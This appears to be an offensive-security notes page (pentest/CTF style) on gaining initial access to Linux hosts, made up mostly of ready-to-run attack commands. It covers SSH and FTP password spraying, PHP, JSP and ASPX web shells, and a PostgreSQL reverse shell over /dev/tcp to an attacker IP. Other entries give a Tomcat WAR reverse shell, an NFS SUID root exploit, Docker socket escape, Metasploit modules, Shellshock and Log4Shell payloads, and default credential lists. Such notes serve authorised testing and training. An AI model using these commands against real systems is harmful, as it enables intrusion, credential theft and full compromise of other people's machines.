Initial Access

Sections Initial Access

Foothold patterns on Linux. Comes after 02 Service Enum gave you a target service. For the shell mechanics, see Reverse Shells .

i. SSH

Weak password, online spray:

hydra -L users.txt -P passwords.txt ssh://"$T" -t 4 -f
nxc ssh "$T" -u users.txt -p passwords.txt

Stolen / leaked private key from web, git, exposed backup:

chmod 600 id_rsa
ssh -i id_rsa user@"$T"
## Encrypted key, crack it first:
ssh2john id_rsa > k.hash
hashcat -m 22921 k.hash "$WL"

Known username + no password set (very common on CTF and badly configured boxes):

ssh root@"$T"                          ## just try with empty password
ssh -o PreferredAuthentications=none "$T"   ## see what's accepted
Old OpenSSH version

If the banner shows OpenSSH < 7.7 and you have user list candidates, try the user enum bug (CVE-2018-15473) to confirm valid usernames before spraying.

ii. FTP

Anonymous read for creds/keys/configs:

wget -m --no-passive ftp://anonymous:anonymous@"$T"
grep -rEi 'pass|user|key|token|secret' .

Anonymous write -> web shell (when FTP root == webroot):

echo '<?php system($_GET[0]); ?>' > sh.php
ftp -nv "$T" <<EOF
user anonymous anonymous
binary
put sh.php
quit
EOF
curl "http://$T/sh.php?0=id"

Known backdoored versions:

  • vsftpd 2.3.4 -> :) smiley in username triggers backdoor on port 6200, msf > use exploit/unix/ftp/vsftpd_234_backdoor
  • ProFTPD 1.3.5 -> mod_copy CVE-2015-3306, copy any file via SITE CPFR/CPTO

iii. SMB

Anonymous + writable share, drop a payload users will execute:

smbclient "//$T/share" -N
## put a .lnk or .scf file with attacker IP icon for hash capture

Anonymous read, look for creds in configs/backups:

smbget -R "smb://$T/share" -U ''
grep -rEi 'pass|cred|secret' .

Known SMB exploits worth checking by version:

  • SMBv1 + Win7/2008 R2 -> MS17-010 (EternalBlue), nmap --script smb-vuln-ms17-010
  • Samba 3.5.0 - 4.4.13 -> CVE-2017-7494 (SambaCry), unauth RCE via writable share
  • Samba 4.5.0 - 4.5.15 -> CVE-2017-12150 (badlock variants)

SambaCry exploit (writable share + known share path):

msfconsole -q -x "use exploit/linux/samba/is_known_pipename; set RHOSTS $T; run"

iv. NFS misconfig

Mountable export with no_root_squash = instant root.

Check exports:

showmount -e "$T"

If no_root_squash is set on any share you can write to, this is root:

sudo mount -t nfs "$T":/export /mnt/nfs -o nolock
## Drop a SUID binary as root from attacker
cat > /mnt/nfs/r.c <<EOF
#include <unistd.h>
int main(){ setuid(0); setgid(0); execl("/bin/bash","bash","-p",NULL); }
EOF
sudo gcc /mnt/nfs/r.c -o /mnt/nfs/r
sudo chmod 4755 /mnt/nfs/r
## Now on target, as any local user:
/mounted/path/r                        ## drops to root shell via -p

v. Web foothold patterns

Full web attack surface lives in 00 Web MOC . The common foothold chains:

  • LFI + PHP wrapper or log poisoning -> RCE
  • Unrestricted file upload -> drop a webshell
  • SSTI in Jinja2/Twig/Freemarker -> RCE
  • SQLi -> --os-shell (sqlmap) or write web shell via INTO OUTFILE
  • Deserialization in Java/PHP/Python apps
  • SSRF -> hit internal services (Redis, metadata endpoints)
  • Path traversal -> read /etc/passwd, SSH keys, app secrets
  • Known CVE: log4shell (CVE-2021-44228), Spring4Shell, Confluence CVE-2022-26134, GitLab CVE-2023-7028

Quick web shell drop after upload bypass:

## PHP
echo '<?php system($_GET[0]); ?>' > sh.php
## JSP (Tomcat)
cat > sh.jsp <<'EOF'
<%@ page import="java.util.*,java.io.*"%>
<% String c=request.getParameter("c"); Process p=Runtime.getRuntime().exec(c); BufferedReader r=new BufferedReader(new InputStreamReader(p.getInputStream())); String l; while((l=r.readLine())!=null) out.println(l); %>
EOF
## ASP/ASPX, when the box is Linux running mono (rare)
echo '<%@ Page Language="C#" %><% System.Diagnostics.Process.Start("cmd","/c "+Request["c"]); %>' > sh.aspx

vi. Tomcat manager

Default creds on /manager/html (tomcat:tomcat, admin:admin, tomcat:s3cret), then upload a WAR shell:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f war -o sh.war
curl --user 'tomcat:tomcat' --upload-file sh.war "http://$T:8080/manager/text/deploy?path=/sh"
curl "http://$T:8080/sh/"

vii. Database -> shell

MySQL with FILE priv -> write webshell to webroot:

SELECT '<?php system($_GET[0]); ?>' INTO OUTFILE '/var/www/html/sh.php';

PostgreSQL >= 9.3 -> COPY FROM PROGRAM:

DROP TABLE IF EXISTS sh; CREATE TABLE sh(x TEXT);
COPY sh FROM PROGRAM 'bash -c "bash -i >& /dev/tcp/10.10.14.1/4444 0>&1"';

Redis -> SSH key write or webshell, see 02 Service Enum -> Redis.

MSSQL -> xp_cmdshell, see 02 Service Enum -> MSSQL.

viii. Docker socket exposed 

docker -H "tcp://$T:2375" run --rm -v /:/host -it alpine chroot /host bash
## You are now root on the host

Local Docker socket (you’re a low-priv user with /var/run/docker.sock readable):

docker run -v /:/host -it alpine chroot /host bash

ix. Common appliance defaults

When a service banner suggests an appliance, try the vendor defaults first:

ServiceCommon default
Jenkinsadmin:admin, no-auth /script
GitLabroot:5iveL!fe (very old), CVE-2023-7028 password reset
Splunkadmin:changeme
Grafanaadmin:admin
Tomcattomcat:tomcat, tomcat:s3cret, admin:admin
Solrno-auth admin panel
Elasticno-auth, sometimes elastic:changeme
CouchbaseAdministrator:password
MongoDBno-auth on legacy installs
ActiveMQadmin:admin

x. CVE-based foothold cheats

When version banner matches, jump straight to exploit:

  • Shellshock (bash <= 4.3) on CGI -> curl -H "User-Agent: () { :; }; /bin/bash -c 'id'" "http://$T/cgi-bin/test.sh"
  • Drupalgeddon2 (Drupal 7.x/8.x) -> CVE-2018-7600, public PoC
  • Log4Shell -> JNDI injection via any logged user-input, ${jndi:ldap://10.10.14.1/x}
  • Confluence OGNL (CVE-2022-26134) -> URL injection
  • Citrix Bleed (CVE-2023-4966) -> memory disclosure on NetScaler

xi. Document the foothold

Before moving to privesc, write down:

  • IP, user, how you got in, what creds you used
  • Where you dropped files, so cleanup is possible later
  • The full command chain that worked, so you can rebuild fast

Then jump to 05 Local Enum .